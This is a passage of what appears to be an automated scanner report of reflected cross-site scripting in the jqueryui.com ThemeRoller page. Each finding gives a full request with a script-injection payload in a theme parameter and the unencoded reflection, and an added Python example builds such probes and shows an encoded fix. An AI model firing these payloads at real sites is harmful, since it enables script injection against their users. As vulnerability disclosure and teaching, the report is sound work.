GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb0988b6a"><script>alert(1)</script>69ecd42034e&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:03 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ult=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb0988b6a"><script>alert(1)</script>69ecd42034e&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgT
...[SNIP]...

4.155. http://jqueryui.com/themeroller/ [cornerRadius parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadius request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cbb08"><script>alert(1)</script>c5888f9db9a was submitted in the cornerRadius parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4pxcbb08"><script>alert(1)</script>c5888f9db9a&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:45 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php?ctl=themeroller&ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4pxcbb08"><script>alert(1)</script>c5888f9db9a&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.pn
...[SNIP]...

4.156. http://jqueryui.com/themeroller/ [cornerRadiusShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the cornerRadiusShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3ffad"><script>alert(1)</script>c201a131bf9 was submitted in the cornerRadiusShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px3ffad"><script>alert(1)</script>c201a131bf9 HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
verlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px3ffad"><script>alert(1)</script>c201a131bf9" type="text/css" media="all" />
...[SNIP]...

4.157. http://jqueryui.com/themeroller/ [fcActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 48878"><script>alert(1)</script>450737abb18 was submitted in the fcActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f0048878"><script>alert(1)</script>450737abb18&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:08 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
s.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f0048878"><script>alert(1)</script>450737abb18&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b
...[SNIP]...
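
A worked reconstruction of what these ThemeRoller findings show, added here as an example; it is not code from jqueryui.com, nor from the scanner that produced this report. It builds the same canary-wrapped probe the scanner sent, checks a response body for the unencoded reflection, and contrasts an assumed vulnerable template for the <link rel="stylesheet"> tag with a fixed one that encodes for both the URL and the attribute context. The URL, parameter names and default values are taken from the report; make_probe, render_link_vulnerable, render_link_fixed, script_elements and the canaries are illustrative assumptions, not the site's source.

```python
"""Reflected XSS into a double-quoted attribute (the ThemeRoller findings above).

Added example for this report, not code from jqueryui.com or from the scanner.
The URL, parameter names and default values come from the report; the canaries
and the render_* templates (a guess at the vulnerable pattern and at its fix)
are constructed for illustration.
"""
import html
import secrets
from html.parser import HTMLParser
from urllib.parse import quote, urlencode

THEMEROLLER = "http://jqueryui.com/themeroller/"
PAYLOAD_CORE = '"><script>alert(1)</script>'

# A subset of the theme parameters from the report, with their default values.
BASE_PARAMS = {
    "ffDefault": "Trebuchet MS, Tahoma, Verdana, Arial, sans-serif",
    "fwDefault": "bold",
    "fsDefault": "1.1em",
    "cornerRadius": "4px",
    "fcActive": "eb8f00",
}


def make_probe(param, prefix=None, suffix=None):
    """Build the probe the scanner sent: the default value of `param` with a
    canary-wrapped payload appended, e.g. fcActive=eb8f0048878"><script>...

    Returns (params, url, prefix, suffix). Random canaries let the checker
    find this reflection rather than any other <script> in the 120 KB page.
    """
    prefix = prefix or secrets.token_hex(3)[:5]
    suffix = suffix or secrets.token_hex(6)[:11]
    params = dict(BASE_PARAMS)
    params[param] = BASE_PARAMS[param] + prefix + PAYLOAD_CORE + suffix
    # safe= keeps the payload characters raw in the URL, as the report shows.
    query = urlencode(params, safe='"<>/(),', quote_via=quote)
    return params, f"{THEMEROLLER}?{query}", prefix, suffix


def reflected_unescaped(body, prefix, suffix):
    """True when the payload appears verbatim between its canaries: the
    application neither encoded nor stripped the quote and angle brackets."""
    return (prefix + PAYLOAD_CORE + suffix) in body


def render_link_vulnerable(params):
    """Rebuilds the stylesheet URL from the raw parameter values, which is the
    pattern the responses above exhibit (assumed, not the site's source)."""
    qs = "&".join(f"{k}={v}" for k, v in params.items())
    return (f'<link rel="stylesheet" href="/themeroller/css/parseTheme.css.php'
            f'?ctl=themeroller&{qs}" type="text/css" media="all" />')


def render_link_fixed(params):
    """Percent-encode every value for the URL context, then HTML-encode the
    whole href for the attribute context: two contexts, two encoders."""
    qs = urlencode({"ctl": "themeroller", **params})
    href = html.escape("/themeroller/css/parseTheme.css.php?" + qs, quote=True)
    return f'<link rel="stylesheet" href="{href}" type="text/css" media="all" />'


class _ScriptCounter(HTMLParser):
    """Counts <script> start tags the way a tokenizer would see them."""

    def __init__(self):
        super().__init__()
        self.count = 0

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            self.count += 1


def script_elements(markup):
    """Number of <script> elements a browser-like tokenizer finds in `markup`."""
    p = _ScriptCounter()
    p.feed(markup)
    p.close()
    return p.count


def demo(param="fcActive"):
    """Probe one parameter and compare the vulnerable and fixed renderings."""
    params, url, prefix, suffix = make_probe(param)
    vuln = render_link_vulnerable(params)
    fixed = render_link_fixed(params)
    return {
        "url": url,
        "vulnerable_reflects": reflected_unescaped(vuln, prefix, suffix),
        "vulnerable_scripts": script_elements(vuln),  # 1: payload broke out
        "fixed_reflects": reflected_unescaped(fixed, prefix, suffix),
        "fixed_scripts": script_elements(fixed),  # 0: stayed inside href
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Run stand-alone it prints the probe URL and the two parse results; against a live target you would fetch url and hand the body to reflected_unescaped. The fixed renderer works because urlencode removes the quote and angle brackets from the URL context and html.escape(..., quote=True) then keeps any remaining ampersands and quotes inert in the attribute context; a value that passes through two contexts needs an encoder for each.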

4.158. http://jqueryui.com/themeroller/ [fcContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4e3de"><script>alert(1)</script>b2a0e37ea13 was submitted in the fcContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=3333334e3de"><script>alert(1)</script>b2a0e37ea13&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:53 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
Header=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=3333334e3de"><script>alert(1)</script>b2a0e37ea13&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHove
...[SNIP]...

4.159. http://jqueryui.com/themeroller/ [fcDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61800"><script>alert(1)</script>1a28793f45b was submitted in the fcDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c461800"><script>alert(1)</script>1a28793f45b&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
cityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c461800"><script>alert(1)</script>1a28793f45b&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass
...[SNIP]...

4.160. http://jqueryui.com/themeroller/ [fcError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2e4a5"><script>alert(1)</script>a8177aafd39 was submitted in the fcError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff2e4a5"><script>alert(1)</script>a8177aafd39&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:58:18 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ghlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff2e4a5"><script>alert(1)</script>a8177aafd39&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opac
...[SNIP]...

4.161. http://jqueryui.com/themeroller/ [fcHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85e25"><script>alert(1)</script>bbf4528bd5e was submitted in the fcHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Trebuchet%20MS,%20Tahoma,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff85e25"><script>alert(1)</script>bbf4528bd5e&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=100&borderColorDefault=cccccc&fcDefault=1c94c4&iconColorDefault=ef8c08&bgColorHover=fdf5ce&bgTextureHover=02_glass.png&bgImgOpacityHover=100&borderColorHover=fbcb09&fcHover=c77405&iconColorHover=ef8c08&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=fbd850&fcActive=eb8f00&iconColorActive=ef8c08&bgColorHighlight=ffe45c&bgTextureHighlight=03_highlight_soft.png&bgImgOpacityHighlight=75&borderColorHighlight=fed22f&fcHighlight=363636&iconColorHighlight=228ef1&bgColorError=b81900&bgTextureError=08_diagonals_thick.png&bgImgOpacityError=18&borderColorError=cd0a0a&fcError=ffffff&iconColorError=ffd27a&bgColorOverlay=666666&bgTextureOverlay=08_diagonals_thick.png&bgImgOpacityOverlay=20&opacityOverlay=50&bgColorShadow=000000&bgTextureShadow=01_flat.png&bgImgOpacityShadow=10&opacityShadow=20&thicknessShadow=5px&offsetTopShadow=-5px&offsetLeftShadow=-5px&cornerRadiusShadow=5px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 15 Nov 2010 07:57:49 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Content-Length: 120256

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a,%20Verdana,%20Arial,%20sans-serif&fwDefault=bold&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=f6a828&bgTextureHeader=12_gloss_wave.png&bgImgOpacityHeader=35&borderColorHeader=e78f08&fcHeader=ffffff85e25"><script>alert(1)</script>bbf4528bd5e&iconColorHeader=ffffff&bgColorContent=eeeeee&bgTextureContent=03_highlight_soft.png&bgImgOpacityContent=100&borderColorContent=dddddd&fcContent=333333&iconColorContent=222222&bgColorDefault=f6f6f6&bgT
...[SNIP]...

4.162. http://jqueryui.com/themeroller/ [fcHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the fcHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44a5d"><script>alert(1)</script>ddc6b19163f was submitted in the fcHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

